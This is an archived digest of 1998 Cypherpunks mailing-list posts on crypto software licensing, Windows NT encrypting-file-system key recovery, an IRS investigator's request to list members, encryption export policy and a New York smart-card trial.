       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 00:36:34 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
Message-ID: <199810081603.LAA17645@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Oct 1998 08:06:51 -0600 (MDT)
> From: Jim Burnes <jvb@ssds.com>
> Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)

> On Thu, 8 Oct 1998, Jim Choate wrote:
> 
> > Especialy when it is clear cypherpunks are anything but. It's almost like
> > some folks believe being a cypherpunk is like joining a lodge.
> > 
> ssssshhhhhhh.....
> 
> BTW: I see your dues are not payed up.  I've checked the records and
> the polaroid of you spitting on the cross is missing.  You can run,
> but you can't hide, Mr Choate.

Good your falling for it....

Always choose where your battles are fault and deny your opponent that
decision.

Now, chase me just a little farther....


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 00:33:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810081606.LAA17694@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Oct 1998 06:56:06 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> Then your argument that free markets lead to monopoly collapses.

No it doesn't.

> You cannot have monopoly (in the sense of the power to extract monopoly of
> profits) except by state intervention as has been proven by experience time
> and time again.

Examine history with an unbiased eye.

> You have been unable to provide any examples of monopolies except those
> created by state intervention, such as the railaways, and those existent
> soley in your fevered imagination, such as the garment industry.

Incorrect. I have listed several examples (eg meat-processing in the 1920's)
where the resultant involvement of the government came *AFTER* (not before
as you claim) there was evidence of wide spread abuse of the consumer and
the employee of those producters.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Fri, 9 Oct 1998 03:06:53 +0800
To: cypherpunks@toad.com
Subject: Crypto AG
Message-ID: <e1ae8e019eaf06300663ce33e67c291a@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>http://caq.com/cryptogate
>
>Are people familiar with this document?
>
>Why shouldn't NSA have implanted this kind of back-doors
>in various software and operating systems as well?
>
>It seems to have worked so very well in the past.

Keep on writing CypherPunks CryptoCode that's can be
gobbled up 4 your M$ softwares....

Da Fedz are more than happy to GAK it up 4 U before
thier morning doughnuts...... Nut$crape did it, Apple
NeXT, maybe Cisco, more 2 follow....

TeeHee!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 8 Oct 1998 19:47:05 +0800
To: ravage@einstein.ssz.com
Subject: change subject lines! (Re: GPL & commercial software, the critical distinction (fwd))
In-Reply-To: <199810080259.VAA15812@einstein.ssz.com>
Message-ID: <199810081053.LAA10571@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Could you guys _please_ change the subject lines to match what you are
talking about, when the thread strays from the original subject lines
topic.

It slows one down to have to scan further than subject fields.  Why
are you using subject fields about `GPL software' to discuss
monopolies / minarchy etc., interesting tho' these discussions may be,
please lable the subject line accordingly!

Thanks,

Adam

Jim and others:

> That's inaccurate. The Mafia pre-dated the US by several hundred years if
> not more (depends on how one wants to choose the bloodline). Most
> definitely they predated the bans on alcohol.
> 
> As to the coke market, In S. America it has been around for quite a while as
> well. The chemical has been used medicinaly for hundreds of years until just
> recently.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Dunlop <nospam@bitstream.net>
Date: Fri, 9 Oct 1998 01:32:52 +0800
To: landon dyer <landon@best.com>
Subject: Re: NT 5.0 and EFS -- A victory for widespread use of crypto?
In-Reply-To: <3.0.3.32.19981007164728.009611c0@shell9.ba.best.com>
Message-ID: <361CF166.EA956C1@bitstream.net>
MIME-Version: 1.0
Content-Type: text/plain





landon dyer wrote:

> At 06:06 PM 10/7/98 -0500, you wrote:
> >
> >Does anyone have any opinions on the encrypting file
> >system (EFS) that is supposed to ship with NT 5.0?
>
>
>   "...NTFS has built-in recovery support so that the encrypted
>    data can be accessed.  In fact, NTFS won't allow files to be
>    encrypted unless the system is configured to have at least
>    one recovery key.  For a domain environment, the recovery keys
>    are defined at the domain controller and are enforced on all
>    machines within the domain...."
>
>   i'll definitely have to play with this one -- wh'appens if you add
> a machine to a domain, encrypt some files, then remove the machine
> from the domain?  can the admin of the domain recover all files
> you encrypt from that point on?  and so on...

MSJ conflicts with the MS white paper in that, according to MS,you can
explicitly turn off key recovery at the domain level.  For
workstations not a part of a domain, key recovery can be turned
off at the local administrator level.

The domain setting overrides the local administrator setting
as long as the workstation is a member of a domain. So the
answer to your question, apparently, depends on the local
administrator's settings for the encryption policy.

>   "...For home users, NTFS automatically generates recovery keys
>    and saves them as machine keys.  You can then use command-line
>    tools to recover data from an administrator's account."
>
>   if i were looking for a point of attack, i'd start with the
> low-level key management here...
>

Their summary is somewhat simplified.  The key managementhas several
alternatives with the usual tradeoffs between
security and convenience.  The private key for recovery can
be stored on a floppy, encrypted using a passphrase, or
for that matter can be destroyed.

>   another interesting thing to try: install NT on a workstation,
> encrypt a removable disk, then reinstall NT on that workstation
> again -- have you defeated key recovery for that disk?  (since the
> machine keys for the first install of NT are presumably gone...)
>
> -landon (re-lurking)

Yes, if you are using self-signed certificates they are
generated randomly during each install.

--
Steve Dunlop
letters: "dunlop" at "bitstream" dot "net"
http://www2.bitstream.net/~dunlop





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Fri, 9 Oct 1998 03:01:54 +0800
To: "Jeff.Gordon@inspection.irs.gov>
Subject: RE: Request for Assistance
In-Reply-To: <9F00F15E736BD11196B700A0C98448FE0A97B6@WR-SEA-SERVER-2>
Message-ID: <000201bdf2e7$df6139a0$982580d0@xasper8d>
MIME-Version: 1.0
Content-Type: text/plain



Jeff,

Good luck in your pursuit.  I think, in the future, you might want to offer
us the customary 800 number to call you on to rat on our acquaintances.

Two things worry me about your approach:

1) how do you know what emails I get and why in the world do you think it's
any of your business?

2) is this suspicion by acquaintance?

I'm sure you already know this, but I just recently joined the list so I
know nothing about anything threatening on this list.  The biggest threat I
see is from people publicizing that the government is sniffing out email
addresses and categorizing them based on what they _receive._

Dangerous pursuit, dangerous precedent.

Watch what side you're on.

X

(although I have to admit, you have a lot of guts to come in here and ask
'free-thinking individuals" to help you gang up on a guy.)

~> -----Original Message-----
~> From: Gordon Jeff INSP [mailto:Jeff.Gordon@inspection.irs.gov]
~> Sent: Thursday, October 08, 1998 8:42 AM
~> To: 'm1tca00@frb.gov'
~> Subject: Request for Assistance
~>
~>
~> Hello,
~>
~> The IRS and United States Attorney's office are looking for assistance
~> in a criminal investigation involving threatening messages which were
~> posted to the Cypherpunks mailing list.  This e-mail address was noted
~> to be one of those which receives the Cypherpunks list.  I would
~> appreciate it if you would contact me to discuss whether you would be
~> willing to assist us in this matter, and what records or information you
~> have relating to the Cypherpunks list.  You can contact me at this
~> e-mail address or at (503) 326-2787.
~>
~> Thanks
~>
~> Jeff
~>
~>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 9 Oct 1998 01:29:54 +0800
To: cypherpunks@cyberpass.net
Subject: Jeff Gordon's RFA
In-Reply-To: <199810081453.KAA05551@maue1.frb.gov>
Message-ID: <199810081652.MAA30524@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Allard,

Thanks much for forwarding Jeff Gordon's message.

I called Jeff at the number provided -- he answered --  I named
myself, described the message and asked if it was genuine, 
that spoofs had appeared on the list recently. 

He said, you mean it appeared on the cypherpunks list. 

I said yes it did and it'd be a help to know which messages 
are believable, that it's a bitch these days trying to figure out 
who's who and who's writing what. 

I said the msg'd be in  the archives shortly if he wanted to 
check it out, and offered  to forward a copy in the meantime. 

He said sure I'll take a look at it and let you know.

So I lobbed it up to WA, without the headers. See the
exchange below.

BTW, did anybody else get one of these? If so, send along,
in the clear or anon.

----------

From: Gordon Jeff  INSP <Jeff.Gordon@inspection.irs.gov>
To: "'John Young'" <jya@pipeline.com>
Subject: RE: Msg Authentication
Date: Thu, 8 Oct 1998 12:31:47 -0400 
Return-Receipt-To: Gordon Jeff  INSP <Jeff.Gordon@inspection.irs.gov>
Mime-Version: 1.0
X-Mailer: Internet Mail Service (5.5.1960.3)
Content-Type: text/plain

John

Thanks for checking on the authentication.  While I had not intended
this to be publicly distributed (call the Netiquette police!) it is not
a forgery

Jeff

> -----Original Message-----
> From:	John Young [SMTP:jya@pipeline.com]
> Sent:	Thursday, October 08, 1998 8:56 AM
> To:	Jeff.Gordon@inspection.irs.gov
> Subject:	Msg Authentication
> 
> Jeff,
> 
> This came via the cpunks mail list this morning; it should be in the
> archives shortly. Header trimmed by me.
> 
> Thanks for authenticating if valid.
> 
> John
> 
> ---------
> 
> 
> >From Jeff.Gordon@inspection.irs.gov  Thu Oct  8 10:48:40 1998
> Return-Path: <Jeff.Gordon@inspection.irs.gov>
> 
> Hello,
> 
> The IRS and United States Attorney's office are looking for assistance
> in a criminal investigation involving threatening messages which were
> posted to the Cypherpunks mailing list.  This e-mail address was noted
> to be one of those which receives the Cypherpunks list.  I would
> appreciate it if you would contact me to discuss whether you would be
> willing to assist us in this matter, and what records or information
> you
> have relating to the Cypherpunks list.  You can contact me at this
> e-mail address or at (503) 326-2787.
> 
> Thanks
> 
> Jeff 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Fri, 9 Oct 1998 02:31:25 +0800
To: "Frank O'Dwyer" <shamrock@netcom.com>
Subject: Vertical vs. Horizontal Crypto (was: RE: propose: `cypherpunks license' (Re: Wanted: Twofish source code))
Message-ID: <2C396693FBDED111AEF60000F84104A721BFFB@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



> Lucky Green writes:
>Cyphpunks believe that more strong crypto is better.

And this holds true for vertical as well as horizontal applications.  Unlike
Mr. Stallman, I think that there is a case where closed-source software is
appropriate, and that case is vertical applications.  Just as I wouldn't
propose that TCE release the source code for our devices (RCA TVs, ProScan
VCRs, etc.), as the intellectual return on the release would be low (how
many people are going to write low-level software for their own TVs?), I
think it is also inappropriate for other vertical-market applications
(another example: book library maintenance software).

However, some of the bad effects of closed-source crypto can be countered by
the use of open crypto protocols, like TLS/SSL, OpenPGP, IPSec, and the
like.  Although this still won't protect against all attempts at getting
around the security of the crypto protocol, at least some crypto protocols
are pretty immune to these kinds of attacks -- for example, a PC web browser
talking to a set-top box using TLS should only be able to be subverted by
the set-top box itself, not by a third party through a hole in the protocol.

I'm somewhat surprised that no one has brought this (open crypto protocols)
up in the discussion before.  (Could it be that I had an original idea?
Nah...)
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Their walls are built of cannon balls, their motto is
'Don't Tread on Me'"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Fri, 9 Oct 1998 02:38:56 +0800
To: aba@dcs.ex.ac.uk>
Subject: Cyphernomicon Intranet Mirror (was: RE: propose: `cypherpunks license' (Re: Wanted: Twofish source code))
Message-ID: <2C396693FBDED111AEF60000F84104A721BFFC@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back writes:
>Try reading the cyphernomicon (*), if you haven't.

Which we've mirrored on our Intranet (been meaning to mention this...).  It
would be terrible if it were to disappear due to linkrot, so we have a local
copy.  Not accessible to the outside, though...

Just another datapoint.
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Their walls are built of cannon balls, their motto is
'Don't Tread on Me'"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Thu, 8 Oct 1998 20:42:54 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <Pine.SUN.3.91.981007180953.11287B-100000@netcom4>
Message-ID: <361CAC40.5BBDD268@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green wrote:
> [Coderpunks distribution removed].
> On Wed, 7 Oct 1998, Frank O'Dwyer wrote:
> > No, it doesn't, because no crypto library gives any application "strong
> > crypto". It has to be used correctly and appropriately for one thing.
> > For another, it needs to be free of back doors, whether intentionally
> > placed there or otherwise. In the long run, full disclosure of source
> > code provides the best assurance that this is so.
> 
> Of course source availablility aids greatly in evaluating the overall
> security of software. However, Jim was correct in pointing out that
> /requirin/g source availability of products by licensing restrictions
> employed in crypto component freeware is
> counterproductive. May companies will not be able to source contaminated
> by GNU-style licensing restrictions. 

[I agree with this point re GPL - hopefully that was clear from the rest
of what I wrote.]

[...]
> We should all thank Eric for making SSLeay available under a BSD-style
> license. The world probably would have half as many internationally
> available strong cryptographic products had Eric used GPL.

I also agree that BSD licencing is better for SSLeay, and crypto
components in general, than GPL (false dichotomy, btw--there are other
licences). My interest in this issue is not so much in crypto
components, but in licensing of open-source "product quality" standalone
applications that employ crypto, since I am trying to write one. I think
the issues for such programs may be different than for components. None
of the freeware licences seem ideal to me, but the MozPL seems like a
good compromise between GPL and BSD-style. (The main sticking point for
me is that it states that disputes regarding the licence should be
resolved in the States.) But I think that BSD/'X' might be overly
liberal for a self-contained program, and GPL has the usual issues for
any useful components that might be in the program. 

Having said that I do question whether take-up of free crypto components
by commercial companies genuinely results in "strong cryptographic
products". I'm not meaning to denigrate Eric's work in any way, but in
my experience the likes of SSLeay is very often shovelled into products
by companies who don't understand crypto, don't understand SSL, and
barely understand SSLeay. Even those who do understand what they are
doing are typically working "on Internet time". Certainly merely linking
to SSLeay does NOT result in a "strong cryptographic product", not by
any stretch of the imagination. 

> The bottom line is that GNU-licensing is more restrictive than
> BSD/SSLeay-style licensing. Hence identical freeware will see less
> deployment under GNU than under BSD.
>
> Cyphpunks believe that more strong crypto is better.

Well then, "Cypherpunks write code". Wide deployment of crypto
components in closed-source programs (especially by cluebags) is neither
necessary nor sufficient to achieve "more strong crypto" in the sense
that Cypherpunks mean it, in my opinion. (Yes, it's better than nothing,
but not much better.)

> The conclusion in the GNU vs. BSD/SSLeay/etc. license debate should be clear.

Well, it clearly isn't, as evidenced by the large number of fairly
bright people arguing about it. :)

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 9 Oct 1998 03:06:55 +0800
To: cypherpunks@Algebra.COM
Subject: Re: [Fwd: [Spooks] British Telecom-Menwith Hill connection]
In-Reply-To: <361BB603.6F40C570@brainlink.com>
Message-ID: <v04011702b242b3aceecb@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:42 PM -0500 10/7/98, Sunder wrote:

>     BT were ordered to pay the legal costs caused by their change of
>heart. The judge accused them of giving away
>     confidential commercial information and national secrets. "If I had a
>burglar alarm system, I would now think twice about
>     having it operated by BT", he said.
>

	If I lived in the U.K. (well, truth be told even here in the U.S.)
I'd think twice about a criminal "justice" system run by the government.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent.
Inc.::petro@playboy.com::petro@bounty.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 9 Oct 1998 03:11:14 +0800
To: Steve Bryan <cypherpunks@toad.com
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981007090445.008903c0@m7.sprynet.com>
Message-ID: <v04011703b242b48621e3@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:39 PM -0500 10/7/98, Steve Bryan wrote:
>David Honig wrote:
>
>>I'd guess that the Export control puppets know that the Web-TV hubs will
>>be subpoena-able by the US even in these other "sovereign" nations.
>>The WebTV centralized infrastructure makes this easy.
>
>This announcement seems to be getting a lot of this sort of reaction but I
>don't see quite why the news is greeted with such animosity. If a duly
>authorized search warrant is required in order to obtain information that
>represents a potential world of difference from having unrestricted ability
>to monitor all communications.

	Because there are no (or fewer) *technical* barriers to getting the
information, it introduces weakness into the system.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent.
Inc.::petro@playboy.com::petro@bounty.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>David Miller <dm0@avana.net>
Date: Fri, 9 Oct 1998 02:19:50 +0800
To: cypherpunks@einstein.ssz.com
Subject: [Fwd: Here come the rafting iguanas]Here come the rafting iguanas
Message-ID: <361D269A.3494@avana.net>
MIME-Version: 1.0
Content-Type: message/rfc822



For some reason, this reminded me of you and your raft/boat experiment...

Could the term "green iguanas" be symbolic of US currency?

Cheers,

--David

http://dailynews.yahoo.com/headlines/od/story.html?s=v/nm/19981008/od/iguanas_1.html

Yahoo! News                                Human Interest Headlines 

Thursday October 8 11:02 AM EDT 

Here come the rafting iguanas

LONDON (Reuters) - Scientists said Wednesday they have solved the mystery of
how animal species were dispersed throughout the Caribbean.

Researchers had suspected that animals living on the tropical islands had
probably hitched rides on floating debris to travel to other islands. But
skeptics said the theory was improbable, unobservable and could never be proven.

Until now.

In a letter to the scientific journal Nature, researchers from the United States
and the Caribbean island of Anguilla said they have evidence that green iguanas,
originally from the island of Guadeloupe, used a natural raft to invade and
colonize Anguilla, about 175 miles (281.6 km) away.

``This species did not previously occur on the island. They arrived on a mat
of logs and uprooted trees,'' Ellen Censky, of the Carnegie Museum of Natural
History in Pittsburgh, Pennsylvania, said.

Local fisherman witnessed the arrival of the 15 refugee iguanas on the eastern
shore of Anguilla in 1995. Censky and her colleagues suspect a particularly bad
hurricane season in the Caribbean that year sparked the exodus.

``Approximately a month after the first of these hurricanes, iguanas reached the
shores of Anguilla,'' said Censky.

The scientists marked many of the males and females that arrived on the raft.
Several months later they noticed that one of the iguanas was pregnant.

``Our observations confirm that raft dispersal can occur successfully, and
document the over-water dispersal of a group of large vertebrates and their
persistence and possible reproduction after landfall,'' Censky added.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 9 Oct 1998 02:17:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Web TV with 128b exported
Message-ID: <199810081753.NAA17450@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Wherever the 128-bit encryption is located, it is irrelevent:
you send someone email, they receive it in clear-text.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 9 Oct 1998 03:29:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: [Fwd: Here come the rafting iguanas] (fwd)
Message-ID: <199810081910.OAA19559@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Oct 1998 14:30:10 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Re: [Fwd: Here come the rafting iguanas]

> At 4:51 PM -0400 on 10/8/98, David Miller wrote:
> 
> > Could the term "green iguanas" be symbolic of US currency?
> 
> Naw... But I hereby nominate the green iguana to be the official mascot of
> the cypherpunk crypto-refugee community on Anguilla.

I'll see if the Austin Cypherpunks want to start holding our meetings at the
Green Iquana Grill out on Lake Travis...


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 9 Oct 1998 03:49:20 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810080259.VAA15812@einstein.ssz.com>
Message-ID: <v04011705b242bf41a705@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:59 PM -0500 10/7/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Wed, 7 Oct 1998 21:52:17 -0400 (EDT)
>> From: Ryan Anderson <ryan@michonline.com>
>> Subject: RE: GPL & commercial software, the critical distinction (fwd)
>
>> > The Mafia. The handful of world-class coke dealers. Your local church.
>>
>> Umm...  both of those are around because the governemtn made the cost of
>> delivering both alcohol and drugs prohibitively high,
>
>That's inaccurate. The Mafia pre-dated the US by several hundred years if

	So what? There was probably a government wherever the started, and
they probably started out providing services that their local government
prohibited.

>not more (depends on how one wants to choose the bloodline). Most
>definitely they predated the bans on alcohol.
>
>As to the coke market, In S. America it has been around for quite a while as
>well. The chemical has been used medicinaly for hundreds of years until just
>recently.

	Which says nothing about whether it was/is a government sponsored/
protected monopoly.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent.
Inc.::petro@playboy.com::petro@bounty.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Watts <davidwatts_98@yahoo.com>
Date: Fri, 9 Oct 1998 05:45:17 +0800
To: cypherpunks@cyberpass.net
Subject: WSJ on NYC Smart Card Pilot
Message-ID: <19981008211928.17064.rocketmail@send104.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Technological Glitches Trip Up
New York Debut of Plastic Cash
By PAUL BECKETT 
Staff Reporter of THE WALL STREET JOURNAL


Smart cards invaded New York last year, when four of consumer
banking's most sophisticated players began one of the biggest
real-world trials of plastic cash.

But right from the start, the closely watched effort slipped on an
unforeseen banana peel: technology.

In a test with far-reaching implications, Chase Manhattan Corp.,
Citicorp --now part of Citigroup Inc. -- MasterCard International and
Visa USA co-sponsored the pilot program, which began last October.
They distributed about 96,000 smart cards embedded with computer chips
to residents of Manhattan's Upper West Side. Then they watched to see
how willing people were to use the cards instead of cash.

The answer is, not very, according to merchants and consumers. A big
reason was the support network of hardware was so riddled with
technical and logistical headaches that it often made using the smart
cards a hassle instead of a breeze. Usage has dwindled to a trickle.
More than a third of the 600 merchants who signed up for the pilot
either have quit or were eliminated from the test by the sponsors.
Many of the ones who remain are fed up.

Smart cards figure in an antitrust lawsuit the Justice Department
filed against Visa and MasterCard Wednesday. The regulators accuse the
bank-controlled credit-card networks of holding back on efforts to
develop new products, including smart cards. Visa and MasterCard
denied the charges and vowed to defend themselves.

The smart cards in the Manhattan test work like the long-distance
phone cards that vending machines in supermarkets sell. The cards --
either a Visa Cash card issued by Citigroup's Citibank unit, or a
MasterCard Mondex card issued by Chase -- are filled with cash from a
person's bank account.

Users draw on the card's stored cash as they pay for merchandise;
store clerks swipe it through a special terminal at the point of
purchase. Users can refill the card with cash at a bank or automated
teller machine. For the test, there are no annual or transaction fees
for customers or merchants.

Tough Customers

The sponsors chose as their guinea pigs the Manhattanites who live in
the swath of real estate between Central Park and the Hudson River, an
eclectic stew of millionaires, welfare families, and everyone in
between. Many of these tough customers quickly found smart cards were
actually pretty dumb. For a start, they weren't accepted in taxis,
buses, and subways.

There also is a harder-to-explain psychological resistance to the
smart cards. "It seems rather un-American to me," says Greg Knight,
who lives on the Upper West Side and works at NYCD Compact Disks. The
store participates in the smart-card program but doesn't record many
transactions. Mr. Knight says he has a smart card but doesn't use it.

A busy Duane Reade drugstore on Amsterdam Avenue should have been a
good testing ground, because most of what it sells is low-priced. But
the smart-card scanners installed at the checkout break down two or
three times a month, says store manager Sammy Austin. After calling
the program's "help desk," Mr. Austin says, he has waited as long as
six days for a repairman, plus two more days for replacement machines.

"If they could improve the system, I think plenty of customers would
use it," Mr. Austin says. "But in a city like New York, where it's
hustle and bustle, everybody wants to be treated one-two-three, and if
you can't accommodate your customers, they're just going to forget
about it. It turns you off."

Sponsors say one reason for the high drop-off rate among merchants is
that there was never any screening: The program was open to any
merchant who wanted to join. The sponsors themselves later culled out
merchants who were recording few smart-card transactions.

Few Purchases

Zabar's, an always-crowded gourmet food store on Broadway, had its
share of technological problems early in the program. When calling the
help desk didn't help, the store bowed out of the experiment for
several weeks, says Zabar's manager David Tait. The store has since
returned, and things have gone more smoothly. Still, it rings up only
25 smart-card purchases a day, Mr. Tait says.

Many of the payment terminals that malfunctioned were made by
Hewlett-Packard Co.'s VeriFone unit, the biggest of the pilot
program's three hardware suppliers. Machines made by the other two --
Hypercom Corp., of Phoenix, and IVI Ingenico Inc., a Canadian-French
joint venture -- had early technical problems, too, the sponsors say,
but on a smaller scale.

VeriFone spokesman Dan Toporek acknowledges the glitches. "There were
instances where the machines weren't installed or configured
properly," he says. Still, he says Verifone regards the terminals as a
success.

Nick Massimiano, vice president at Chase Manhattan, says the sponsors
moved fast to address the delays in service. A software adjustment
fixed many of the problems with the Verifone terminals, he says. Foot
patrols of repair technicians check in with merchants to help
trouble-shoot.

Fairway, a bustling supermarket on Broadway, stopped taking smart
cards after just a few weeks. Employees there said it was a hassle to
process transactions on the smart-card terminal, which is separate
from both the cash register and the credit-card machine.

Other merchants complain about having to reconcile their terminals
with the smart cards' central computer at the end of the day, so the
smart-card purchases will land in their bank accounts. For this task,
the sponsors had presented retailers with various options, but some
employees never got the hang of the task. So at many of the stores, it
became a bothersome after-hours chore for the boss.

Mr. Massimiano says adjustments in the modem timing of the terminals
has made it easier for stores to settle accounts at the end of the
day. But the real issue here is training, not technology, he says. The
sponsors issued desktop guides for making the fund transfers. The
roaming foot patrols also provide training assistance, he says.

'A Less Positive Experience'

"Lots of little things, when you add them up, can create a less than a
positive experience," concedes Ron Braco, senior vice president and
director of electronic commerce for Chase Manhattan's consumer-banking
division. Still, the program has yielded some victories, he says. For
the first time in any test program, the Visa and MasterCard smart
cards were accepted on the same terminals.

Lessons learned suggest the four partners will shy away from broad
efforts to blanket an entire neighborhood, focusing instead on
specific retail niches in which smart cards are especially useful.

"I would say the time for experimentation is probably passed now,"
says Richard Phillimore, senior vice president of MasterCard's
chip-business group. "This really points the direction toward rolling
out not necessarily by geography but by merchant sector."

One such sector is small-ticket purchases -- launderettes and
newsstands, for example. In the latest chapter of the Upper West Side
test, smart cards have been introduced in basement laundry rooms in a
few of the neighborhood's apartment buildings. So far, the backers
say, they have been a roaring success: Smart card users don't need
piles of quarters any more. Chase says on average 25% of the laundry
revenue at the participating buildings comes from smart cards, and in
some locations approaches 40%.

"Once the card generates some excitement, people won't care that Duane
Reade had a problem at some point in time," says Chase spokesman
Kenneth Herz. Adds Judy Darr, director of the smart card program at
Citibank, "Our commitment to smart cards remains strong."





_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Oct 1998 05:50:30 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.24: Privacy Campaign Plods Ahead
Message-ID: <199810082123.OAA29156@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.24: Privacy Campaign Plods Ahead
Date: Thu, 8 Oct 1998 00:29:48 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.24: Privacy Campaign Plods Ahead
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Thursday October 8, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
